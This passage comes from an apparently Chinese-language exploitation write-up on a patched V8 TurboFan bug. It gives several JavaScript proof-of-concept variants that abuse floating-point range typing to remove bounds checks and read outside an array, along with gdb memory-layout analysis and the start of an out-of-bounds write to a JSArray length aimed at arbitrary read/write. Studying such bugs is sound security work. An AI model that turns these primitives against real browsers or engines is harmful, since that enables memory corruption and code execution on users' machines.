class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>]; <span class="comment">// length =&gt; Range(5, 5)</span></span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? 
<span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    <span class="comment">// At this point t =&gt; interpreted/compiled: Range(9007199254740989, 9007199254740992)</span></span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">/* At this point t =&gt; </span></span><br><span class="line"><span class="comment">        interpreted: Range(9007199254740991, 9007199254740992)</span></span><br><span class="line"><span class="comment">        compiled:    Range(9007199254740991, 9007199254740994)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="comment">/* At this point t =&gt; </span></span><br><span class="line"><span class="comment">        interpreted: Range(2, 3)</span></span><br><span class="line"><span class="comment">        compiled:    Range(2, 5)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p>The graph after typing is shown below; the typed index range satisfies the CheckBounds condition:</p><p><img src="/2021/01/v8-turboFan/poc_1.png" alt="img"></p><p>The CheckBounds node is therefore eliminated in <code>SimplifiedLoweringPhase</code>:</p><p><img src="/2021/01/v8-turboFan/poc_2.png" 
alt="img"></p><p>输出的结果如下：</p><blockquote><p>注：输出结果中的<code>DuplicateAdditionReducer::ReduceAddition Called/Success</code>，是打patch后的输出内容，在原v8中没有该输出。</p></blockquote><p><img src="/2021/01/v8-turboFan/ctfoutput1.png" alt="img"></p><p>可以看到，成功将两个+1操作优化为+2，并在最末尾处成功<strong>越界读取</strong>到一个数组外的元素。</p></li><li><p>这里需要说一下构建poc可能存在的问题：</p><ul><li><p>POC1：<strong>无 if 分支</strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="comment">// 这里没有使用上面if xxx这样的语句，直接一个整数赋值</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">// let t = Number.MAX_SAFE_INTEGER + 1; </span></span><br><span class="line">    <span class="keyword">let</span> t = <span class="number">9007199254740992</span>; </span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span 
class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>Problem</strong>: the function only adds and subtracts constants, so when <code>ConstantFoldingReducer</code> runs in <code>TypedLoweringPhase</code>, the three arithmetic expressions are folded straight into a single constant and <code>DuplicateAdditionReducer</code> never gets a chance to run.</p><p><img src="/2021/01/v8-turboFan/poc1.png" alt="img"></p><p><strong>Fix</strong>: use an <code>if</code> branch, so that the <code>Range</code> is set indirectly through a <code>phi</code> node.</p></li></ul><blockquote><p>The issues below are harder to explain.</p></blockquote><ul><li><p>POC2: <strong>using <code>Number.MAX_SAFE_INTEGER</code></strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span 
class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">        : <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：在<code>GraphBuilderPhase</code>中，type feedback推测目标函数的参数只会为<code>1</code>，因此turboFan推测函数中的条件判断式 <strong>“恒”成立</strong> ，故在<code>InliningPhase</code>中优化<code>merge</code>结点，使得变量<code>t</code>始终为一个常数。</p><p><img src="/2021/01/v8-turboFan/poc2_1.png" alt="img"></p><p>之后就执行<code>TypedLoweringPhase</code>中的<code>ConstantFoldingReducer</code>再次将其优化为一个常数，以至于无法执行<code>DuplicateAdditionReducer</code>优化。</p><p>通过turbolizer我们可以看出，若判断条件为真，则将优化好的结果输出；若判断条件为假，则说明type feedback出现错误，需要执行deopt。</p><p><img src="/2021/01/v8-turboFan/poc2.png" alt="img"></p><blockquote><p>至于为什么先前的poc不会优化merge结点，而当前这个poc会优化merge结点，</p><p>这个问题仍然需要进一步探索。</p></blockquote><p><strong>解决方法</strong>：</p><ol><li><p>不同时在 if 
语句的两个分支处使用<code>Number.MAX_SAFE_INTEGER</code></p> <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? 
<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">        <span class="comment">// 修改了此处</span></span><br><span class="line">        : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure></li><li><p>在执行<code>%OptimizeFunctionOnNextCall</code>前，使函数调用传入的参数<strong>不单一</strong>:</p> <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span 
class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> + <span class="number">1</span> </span><br><span class="line">          : <span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= (<span class="title class_">Number</span>.<span class="property">MAX_SAFE_INTEGER</span> - <span class="number">2</span>);</span><br><span class="line">  <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">0</span>));  <span class="comment">// 添加了此行</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure></li></ol></li><li><p>POC3：<strong>不使用<code>let/var/const</code>修饰词</strong></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 错误：arr前没有let、var或者const</span></span><br><span class="line">    arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="comment">// 错误：t 前没有let</span></span><br><span class="line">    t = (x == <span class="number">1</span> ? 
<span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>问题点</strong>：经过gdb动态调试可知，若数组前没有修饰词，则<code>CheckBounds</code>的上一个结点<code>LoadField</code>结点将不会被<code>LoadEliminationPhase</code>优化，这样使得数组<code>length</code>结点的范围最大值为134217726，最后导致无法成功优化<code>CheckBounds</code>结点：</p><p><img src="/2021/01/v8-turboFan/poc3.png" alt="img"></p><p>同时，若变量<code>t</code>前没有修饰词，则越界的<code>add</code>操作将被<code>check</code>出，进而设置值为<code>inf/NaN</code>，之后的减法就无法计算出我们所期望的Range值：</p><p><img src="/2021/01/v8-turboFan/poc3_1.png" alt="img"></p><p><strong>解决方法</strong>：添加修饰词。</p><blockquote><p>因为没有修饰词 let / var 的变量都是全局变量，而 Load Elimination 的优化对作用域有一定的要求，因此全局变量的 LoadField 结点将不会被优化。</p></blockquote></li><li><p>POC4：使用<strong>整数数组</strong></p>  <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">const</span> arr = [<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="keyword">return</span> arr[t];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">f</span>(<span class="number">1</span>));</span><br></pre></td></tr></table></figure><p><strong>Problem</strong>: the program crashes when <code>console.log</code> runs:</p><p><img src="/2021/01/v8-turboFan/poc4.png" alt="img"></p><p><strong>Fix</strong>: change the array's element type. After some testing, it seems that only a <strong>floating-point array</strong> works; with any other element type the output step <strong>crashes</strong>.</p></li><li><p>Summary: building a POC means going through the cycle <strong>edit the code =&gt; check the output =&gt; inspect the node graph in turbolizer =&gt; work out what went wrong</strong> 
many times over. Sometimes you also need to patch the source and debug under gdb, so it takes patience.</p></li></ul></li><li><p>When building a POC, only two things really matter:</p><ol><li><p>whether the <code>DuplicateAdditionReducer</code> optimization actually runs;</p></li><li><p>whether the <code>CheckBounds</code> node gets optimized away.</p></li></ol><p>If both conditions hold, the resulting POC can most likely achieve OOB access.</p></li></ul><h5 id="2-越界读取">2) Out-of-bounds read</h5><p>With the POC in hand, let's look at the memory location that the out-of-bounds read hits.</p><p>Barring surprises, it should be the 8 bytes right after the last element, <code>5.5</code>:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? 
<span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>) + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(arr[t]);</span><br><span class="line">    <span class="comment">// 将arr数组详细信息输出</span></span><br><span class="line">    %<span class="title class_">DebugPrint</span>(arr);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 下断点，使v8在gdb中暂停</span></span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>启动GDB，可以看到 d8 自动暂停执行：</p><p><img src="/2021/01/v8-turboFan/gdbtrap.png" alt="img"></p><p>之后我们可以找到DebugPrint出的数组内存地址：</p><p><img src="/2021/01/v8-turboFan/debugprint1.png" alt="img"></p><p>每个Object内部都有一个map，该map用于描述对应结构的相关属性。其中包括了当前Object的实例大小，以及一些供GC使用的信息。通过上面的输出，我们可以得到，当前JSArray的实例大小只有32字节。</p><blockquote><p>map的具体信息请查阅源码 src/objects/map.h 中的注释。</p></blockquote><p>因此，数组中的其他元素肯定存放于另一个数组，而这个数组的类型为<code>FixedDoubleArray</code>，其地址存放于JSArray中。</p><blockquote><p>需要注意的是：v8 中的指针值大多被打上了tag，以便于区分某个值是pointer还是smi。</p><p>因此在gdb使用某个地址时，最低位需要手动置0。</p></blockquote><p>以下是某个 JSArray 的内存布局：</p><p><img src="/2021/01/v8-turboFan/debugprint2.png" alt="img"></p><p>注意到 JSArray中，第四个8字节数据（即上图中的<code>0x0000000500000000</code>）存放的是当前数组的length（5），即便数组元素并没有存放在当前这块内存上。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/js-array.h</span></span><br><span class="line"><span class="comment">// static const int v8::internal::JSObject::kHeaderSize = 24</span></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> int kLengthOffset = <span class="title class_">JSObject</span>::kHeaderSize;</span><br></pre></td></tr></table></figure><p>Back to the topic at hand: the element values are stored in a <code>FixedDoubleArray</code>, so let's dump its memory layout:</p><p><img src="/2021/01/v8-turboFan/debugprint3.png" alt="img"></p><p>As shown, the out-of-bounds read returns exactly what we guessed earlier: the 8 bytes following the last element.</p><p>The gdb output also shows that a JSArray's length is stored both in the JSArray itself and in the FixedDoubleArray. The code that sets both can be located directly in the source:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/js-array-inl.h</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSArray::SetContent</span><span class="params">(Handle&lt;JSArray&gt; array,</span></span></span><br><span class="line"><span class="params"><span class="function">                         Handle&lt;FixedArrayBase&gt; storage)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">EnsureCanContainElements</span>(array, storage, storage-&gt;<span class="built_in">length</span>(),</span><br><span 
class="line">                           ALLOW_COPIED_DOUBLE_ELEMENTS);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(</span><br><span class="line">      (storage-&gt;<span class="built_in">map</span>() == array-&gt;<span class="built_in">GetReadOnlyRoots</span>().<span class="built_in">fixed_double_array_map</span>() &amp;&amp;</span><br><span class="line">       <span class="built_in">IsDoubleElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>())) ||</span><br><span class="line">      ((storage-&gt;<span class="built_in">map</span>() != array-&gt;<span class="built_in">GetReadOnlyRoots</span>().<span class="built_in">fixed_double_array_map</span>()) &amp;&amp;</span><br><span class="line">       (<span class="built_in">IsObjectElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>()) ||</span><br><span class="line">        (<span class="built_in">IsSmiElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>()) &amp;&amp;</span><br><span class="line">         Handle&lt;FixedArray&gt;::<span class="built_in">cast</span>(storage)-&gt;<span class="built_in">ContainsOnlySmisOrHoles</span>()))));</span><br><span class="line">  <span class="comment">// length is stored both in the JSArray and in the FixedArrayBase</span></span><br><span class="line">  array-&gt;<span class="built_in">set_elements</span>(*storage);</span><br><span class="line">  array-&gt;<span class="built_in">set_length</span>(Smi::<span class="built_in">FromInt</span>(storage-&gt;<span class="built_in">length</span>()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>In practice, however, the length in the FixedDoubleArray only describes the allocation of the backing store, while the bounds check looks only at the JSArray's length. This means we <strong>must modify the JSArray's length before we can build arbitrary read/write</strong>.</p><blockquote><p>The code below checks whether an array access is out of bounds:</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/ic/ic.cc</span></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">IsOutOfBoundsAccess</span><span class="params">(Handle&lt;Object&gt; receiver, <span class="type">uint32_t</span> index)</span> </span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> length = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsJSArray</span>()) &#123;</span><br><span class="line">    <span class="comment">// 获取 JSArray 的 length</span></span><br><span class="line">    JSArray::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">length</span>()-&gt;<span class="built_in">ToArrayLength</span>(&amp;length);</span><br><span class="line">  &#125; 
<span class="keyword">else</span> <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsString</span>()) &#123;</span><br><span class="line">    length = String::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">length</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsJSObject</span>()) &#123;</span><br><span class="line">    length = JSObject::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">elements</span>()-&gt;<span class="built_in">length</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 判断是否越界</span></span><br><span class="line">  <span class="keyword">return</span> index &gt;= length;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">KeyedAccessLoadMode <span class="title">GetLoadMode</span><span class="params">(Isolate* isolate, Handle&lt;Object&gt; receiver,</span></span></span><br><span class="line"><span class="params"><span class="function">                                <span class="type">uint32_t</span> index)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 一开始就判断越界</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">IsOutOfBoundsAccess</span>(receiver, index)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> STANDARD_LOAD;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span 
class="comment">Call stack:</span></span><br><span class="line"><span class="comment">    #0  v8::internal::(anonymous namespace)::IsOutOfBoundsAccess</span></span><br><span class="line"><span class="comment">    #1  v8::internal::(anonymous namespace)::GetLoadMode</span></span><br><span class="line"><span class="comment">    #2  v8::internal::KeyedLoadIC::Load</span></span><br><span class="line"><span class="comment">    #3  v8::internal::__RT_impl_Runtime_KeyedLoadIC_Miss</span></span><br><span class="line"><span class="comment">    #4  v8::internal::Runtime_KeyedLoadIC_Miss</span></span><br><span class="line"><span class="comment">    #5  Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit</span></span><br><span class="line"><span class="comment">    ....</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>To verify the above, I manually changed the JSArray's length in gdb and found that a release build of v8 <strong>does allow the out-of-bounds read</strong>. A debug build, however, trips the <code>DCHECK</code> in <code>FixedArray</code> and crashes:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/fixed-array-inl.h</span></span><br><span class="line"><span class="built_in">DCHECK</span>(index &gt;= <span class="number">0</span> &amp;&amp; index &lt; <span class="keyword">this</span>-&gt;<span class="built_in">length</span>());</span><br></pre></td></tr></table></figure><p>So when building a debug version of v8, you need to manually comment out the bounds-checking DCHECK in <code>src/objects/fixed-array-inl.h</code>.</p><blockquote><p>Do not simply switch to a release build of v8 to get rid of the DCHECK; that makes debugging much harder.</p></blockquote><h4 id="b-构造任意地址读写">b. 
Building arbitrary read/write</h4><h5 id="1-JSArray-修改-length">1) Modifying the JSArray length</h5><ul><li><p>Dumping the memory layout of the FixedArray shows that the JSArray and the FixedArray data sit <strong>directly next to each other</strong>, with the FixedArray at the lower address. This is an ideal setup for modifying the JSArray's length:</p><p><img src="/2021/01/v8-turboFan/debugprint4.png" alt="img"></p></li><li><p>Now we can try to overwrite the JSArray's length out of bounds. Note that we have to reach four slots past the last element to hit length, so the out-of-bounds range of the POC needs a small adjustment:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>]; <span 
class="comment">// length =&gt; Range(7, 7)</span></span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    <span class="comment">// 此时 t =&gt; 解释/编译 Range(9007199254740989, 9007199254740992)</span></span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(9007199254740991, 9007199254740992)</span></span><br><span class="line"><span class="comment">        编译：Range(9007199254740991, 9007199254740994)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(1, 2)</span></span><br><span class="line"><span class="comment">        编译：Range(1, 4)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(2, 4)</span></span><br><span class="line"><span class="comment">        编译：Range(2, 8)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(4, 6)</span></span><br><span class="line"><span class="comment">        编译：Range(4, 10)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span 
